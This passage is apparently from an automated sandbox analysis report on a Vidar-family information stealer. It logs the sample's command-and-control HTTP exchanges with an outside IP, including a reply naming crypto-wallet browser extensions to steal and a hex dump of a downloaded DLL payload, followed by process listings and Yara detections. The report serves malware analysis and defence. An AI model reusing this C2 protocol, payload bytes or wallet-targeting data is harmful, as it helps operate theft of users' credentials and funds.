                                                                                                                                                                                                                                2024-09-21 11:35:52 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 35 32 38 36 33 35 33 33 61 63 61 34 63 38 38 34 36 30 34 63 38 38 37 65 31 36 66 62 65 34 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"c52863533aca4c884604c887e16fbe41------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------IDAKJKEHDBGHIDHIEHDBCont
                                                                                                                                                                                                                                2024-09-21 11:35:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:52 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:52 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                39192.168.2.949805116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:54 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 7945
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:54 UTC7945OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 35 32 38 36 33 35 33 33 61 63 61 34 63 38 38 34 36 30 34 63 38 38 37 65 31 36 66 62 65 34 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"c52863533aca4c884604c887e16fbe41------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------DAECGCGHCGHCAKECBKJKCont
                                                                                                                                                                                                                                2024-09-21 11:35:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:54 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                40192.168.2.949806116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC196OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:55 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 2459136
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:55 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                                                                                Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                                                                                Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                                                                                Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                                                                                Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                                                                                Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                2024-09-21 11:35:55 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                41192.168.2.949807116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:58 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 829
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:58 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 35 32 38 36 33 35 33 33 61 63 61 34 63 38 38 34 36 30 34 63 38 38 37 65 31 36 66 62 65 34 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"c52863533aca4c884604c887e16fbe41------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------FBKFCFBFIDGCGDHJDBKFCont
                                                                                                                                                                                                                                2024-09-21 11:35:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:58 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 5block0


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:07:33:31
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe"
                                                                                                                                                                                                                                Imagebase:0xa50000
                                                                                                                                                                                                                                File size:2'457'088 bytes
                                                                                                                                                                                                                                MD5 hash:96CB7DF578398D5D46DD4DAEFFBDC41F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:07:33:32
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                Imagebase:0xd0000
                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:07:33:32
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                Imagebase:0xd20000
                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe
                                                                                                                                                                                                                                Imagebase:0x20000
                                                                                                                                                                                                                                File size:423'328 bytes
                                                                                                                                                                                                                                MD5 hash:92C66C140509B75BAE23F055D427AFB4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:6'666'862 bytes
                                                                                                                                                                                                                                MD5 hash:8FB3610C4BA81A5A93666562E712740A
                                                                                                                                                                                                                                Has elevated privileges:true
